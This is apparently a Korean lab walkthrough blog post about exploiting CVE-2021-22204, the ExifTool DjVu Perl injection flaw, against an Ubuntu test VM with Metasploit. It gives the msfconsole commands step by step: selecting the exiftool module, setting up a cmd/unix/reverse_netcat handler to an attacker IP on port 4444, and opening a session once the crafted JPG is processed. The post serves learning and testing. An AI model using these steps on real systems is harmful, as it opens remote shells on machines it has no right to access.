CVE-2021-22204
목표 취약한 우분투에서 해당 취약점이 적용이 되는지 확인하기
방식 Backend
[취약점 정보]
CVE: CVE-2021-22204
Exploit: exploit/unix/fileformat/exiftool_djvu_ant_perl_injection
Disclosure Data: 2021-05-24
Rank: excellent
[취약점 요약]
이미지 파일의 메타 데이터를 수정할 때 사용되는 ExifTool에서 임의 코드 실행 취약점이 발견되었다. ExifTool은 perl 스크립트로 구현되었다.
[메타스플로잇을 이용하여 CVE 정보]
0. ifconfig
공격자
공격대상
1. CVE 검색하기
search cve-2021-22204
use unix/fileformat/exiftool_djvu_ant_perl_injection
info
options
서버에서 클라이언트의 연결을 확인하는 listener가 없기 때문에 만들어줘야 한다.
Handler -P: 공격자 Port -H: 공격자 IP -p: 페이로드 입력 |
handler -P 4444 -H 172.16.0.128 -p cmd/unix/reverse_netcat
설정 후 exploit
저장된 장소로 이동하여 공격대상 가상머신으로 옮겨준다.
우분투에 jpg 파일과 exiftool 압축파일을 옮기고 압축해제.
공격대상
exiftool을 사용하여 이미지를 실행시킬 때, 세션이 맺어지는 것을 볼 수 있다.
공격자
프로세스 돌아가는 것을 확인
sessions 확인
이미지 실행 후,
sessions -i ID(=1)
ifconfig 명령어를 통해서 공격대상의IP 정보를 볼 수 있다.
공격 대상과 세션 맺기 성공!!
'Security > Metasploit' 카테고리의 다른 글
[Attack] CVE-2021-32682: 메타스플로잇(Metasploit) 이용한 취약점 공격 (273) | 2022.09.15 |
---|---|
[Attack] CVE-2021-25646: 메타스플로잇(Metasploit) 이용한 취약점 공격 (1610) | 2021.11.11 |
[Attack] CVE-2021-35464: 메타스플로잇(Metasploit) 이용한 취약점 공격 (277) | 2021.11.11 |
메타스플로잇(Metasploit) Msfconsole 사용법 및 활용 / 업데이트 (1724) | 2021.11.11 |